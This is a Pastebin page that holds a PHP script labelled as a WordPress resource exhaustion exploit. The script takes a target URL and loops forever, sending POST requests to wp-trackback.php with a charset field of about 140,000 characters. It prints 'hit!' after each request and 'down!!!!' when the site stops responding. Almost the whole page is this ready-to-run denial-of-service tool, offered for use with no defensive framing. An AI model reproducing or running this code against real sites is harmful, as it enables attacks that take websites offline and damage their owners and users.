Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

CrowDat

By: a guest on Oct 18th, 2009  |  syntax: PHP  |  size: 1.56 KB  |  views: 478  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1.     <?php
  2.     //wordpress Resource exhaustion Exploit
  3.     //http://rooibo.wordpress.com/
  4.     //security@wordpress.org contacted and get a response,
  5.     //but no solution available.
  6.     if(count($argv) < 2) {
  7.     echo "You need to specify a url to attack\n";
  8.     exit;
  9.     }
  10.  
  11.     $url = $argv[1];
  12.  
  13.     $data = parse_url($url);
  14.     if(count($data) < 2) {
  15.     echo "The url should have http:// in front of it, and should be complete.\n";
  16.     exit;
  17.     }
  18.  
  19.     if(count($data) == 2) {
  20.     $path = "";
  21.     } else {
  22.     $path = $data['path'];
  23.     }
  24.     $path = trim($path,'/');
  25.     $path .= '/wp-trackback.php';
  26.     if($path{0} != '/') {
  27.     $path = '/'.$path;
  28.     }
  29.  
  30.     $b = "";
  31.     $b = str_pad($b,140000,'ABCEDFG');
  32.     $b = utf8_encode($b);
  33.     $charset = "";
  34.     $charset = str_pad($charset,140000,"UTF-8,");
  35.  
  36.     $str = 'charset='.urlencode($charset);
  37.     $str .= '&url=www.example.com';
  38.     $str .= '&title='.$b;
  39.     $str .= '&blog_name=lol';
  40.     $str .= '&excerpt=lol';
  41.  
  42.     $count = 0;
  43.     while(1) {
  44.     $fp = @fsockopen($data['host'],80);
  45.     if(!$fp) {
  46.     if($count > 0) {
  47.     echo "down!!!!\n";
  48.     exit;
  49.     }
  50.     echo "unable to connect to: ".$data['host']."\n";
  51.     exit;
  52.     }
  53.  
  54.     fputs($fp, "POST $path HTTP/1.1\r\n");
  55.     fputs($fp, "Host: ".$data['host']."\r\n");
  56.     fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
  57.     fputs($fp, "Content-length: ".strlen($str)."\r\n");
  58.     fputs($fp, "Connection: close\r\n\r\n");
  59.     fputs($fp, $str."\r\n\r\n");
  60.  
  61.     echo "hit!\n";
  62.     $count++;
  63.     }
  64.  
  65.     ?>